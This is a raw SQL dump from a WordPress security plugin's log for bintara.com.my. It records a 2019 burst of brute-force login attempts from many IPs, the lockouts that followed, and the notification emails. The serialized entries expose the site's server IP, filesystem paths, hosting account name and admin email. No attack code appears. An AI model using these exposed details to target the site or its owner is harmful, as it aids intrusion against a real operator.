10:32:34',17799424,19290400,'https://bintara.com.my/test/wp-login.php',1,0,'144.217.72.200'),(25210,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 10:31:54','2019-09-21 10:31:53',18088992,19290080,'https://bintara.com.my/wp/wp-login.php',1,0,'13.67.183.43'),(25211,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYX8HjDrcQxTmGrCWuaHGwAAAco\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"188.254.18.110\";s:11:\"REMOTE_PORT\";s:5:\"46234\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYX8HjDrcQxTmGrCWuaHGwAAAco\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569061918.4417\";s:12:\"REQUEST_TIME\";s:10:\"1569061918\";}}','notice','2019-09-21 10:31:59','2019-09-21 10:31:58',17798200,19289624,'https://bintara.com.my/wordpress/wp-login.php',1,0,'188.254.18.110'),(25209,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 18:31:53\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 10:31:53\";s:14:\"lockout_expire\";s:19:\"2019-09-21 18:46:53\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 10:46:53\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 10:31:54','2019-09-21 10:31:53',17883096,19290080,'https://bintara.com.my/wp/wp-login.php',1,0,'13.67.183.43'),(25206,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 18:31:22\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 10:31:22\";s:14:\"lockout_expire\";s:19:\"2019-09-21 18:46:22\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 10:46:22\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 10:31:23','2019-09-21 10:31:22',17883816,19289312,'https://bintara.com.my/blog/wp-login.php',1,0,'148.66.142.18'),(25207,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 10:31:23','2019-09-21 10:31:22',18089528,19289312,'https://bintara.com.my/blog/wp-login.php',1,0,'148.66.142.18'),(25208,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYX8GGYqJrDl1gYLQWcWgwAAAAE\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"13.67.183.43\";s:11:\"REMOTE_PORT\";s:5:\"59330\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYX8GGYqJrDl1gYLQWcWgwAAAAE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569061912.9999\";s:12:\"REQUEST_TIME\";s:10:\"1569061912\";}}','notice','2019-09-21 10:31:54','2019-09-21 10:31:53',17798216,19290080,'https://bintara.com.my/wp/wp-login.php',1,0,'13.67.183.43'),(25203,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 18:30:54\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 10:30:54\";s:14:\"lockout_expire\";s:19:\"2019-09-21 18:45:54\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 10:45:54\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 10:30:55','2019-09-21 10:30:54',17882944,19289000,'https://bintara.com.my/wordpress/wp-login.php',1,0,'122.201.118.30'),(25204,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 10:30:55','2019-09-21 10:30:54',18088680,19289000,'https://bintara.com.my/wordpress/wp-login.php',1,0,'122.201.118.30'),(25205,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYX7@liJ7D9Gn7wDPh8SngAAAMU\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"148.66.142.18\";s:11:\"REMOTE_PORT\";s:5:\"45884\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYX7@liJ7D9Gn7wDPh8SngAAAMU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569061882.2598\";s:12:\"REQUEST_TIME\";s:10:\"1569061882\";}}','notice','2019-09-21 10:31:23','2019-09-21 10:31:22',17798976,19289312,'https://bintara.com.my/blog/wp-login.php',1,0,'148.66.142.18'),(25201,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 10:30:49','2019-09-21 10:30:48',18089336,19288728,'https://bintara.com.my/2019/wp-login.php',1,0,'161.129.139.26'),(25202,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYX73ViJ7D9Gn7wDPh8SkQAAAMo\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"122.201.118.30\";s:11:\"REMOTE_PORT\";s:5:\"36478\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYX73ViJ7D9Gn7wDPh8SkQAAAMo\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569061853.993\";s:12:\"REQUEST_TIME\";s:10:\"1569061853\";}}','notice','2019-09-21 10:30:55','2019-09-21 10:30:54',17798304,19289000,'https://bintara.com.my/wordpress/wp-login.php',1,0,'122.201.118.30'),(25200,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 18:30:48\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 10:30:48\";s:14:\"lockout_expire\";s:19:\"2019-09-21 18:45:48\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 10:45:48\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 10:30:49','2019-09-21 10:30:48',17883648,19288728,'https://bintara.com.my/2019/wp-login.php',1,0,'161.129.139.26'),(25197,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 18:30:35\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 10:30:35\";s:14:\"lockout_expire\";s:19:\"2019-09-21 18:45:35\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 10:45:35\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 10:30:36','2019-09-21 10:30:35',17882048,19287904,'https://bintara.com.my/wp/wp-login.php',1,0,'128.199.223.127'),(25198,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 10:30:36','2019-09-21 10:30:35',18087696,19287904,'https://bintara.com.my/wp/wp-login.php',1,0,'128.199.223.127'),(25199,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYX712YqJrDl1gYLQWcWFwAAAAE\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"161.129.139.26\";s:11:\"REMOTE_PORT\";s:5:\"49812\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYX712YqJrDl1gYLQWcWFwAAAAE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569061847.559\";s:12:\"REQUEST_TIME\";s:10:\"1569061847\";}}','notice','2019-09-21 10:30:49','2019-09-21 10:30:48',17798808,19288728,'https://bintara.com.my/2019/wp-login.php',1,0,'161.129.139.26'),(25194,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 18:29:26\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 10:29:26\";s:14:\"lockout_expire\";s:19:\"2019-09-21 18:44:26\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 10:44:26\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 10:29:27','2019-09-21 10:29:26',17884312,19290400,'https://bintara.com.my/test/wp-login.php',1,0,'192.151.218.99'),(25195,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 10:29:27','2019-09-21 10:29:26',18090280,19290400,'https://bintara.com.my/test/wp-login.php',1,0,'192.151.218.99'),(25196,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 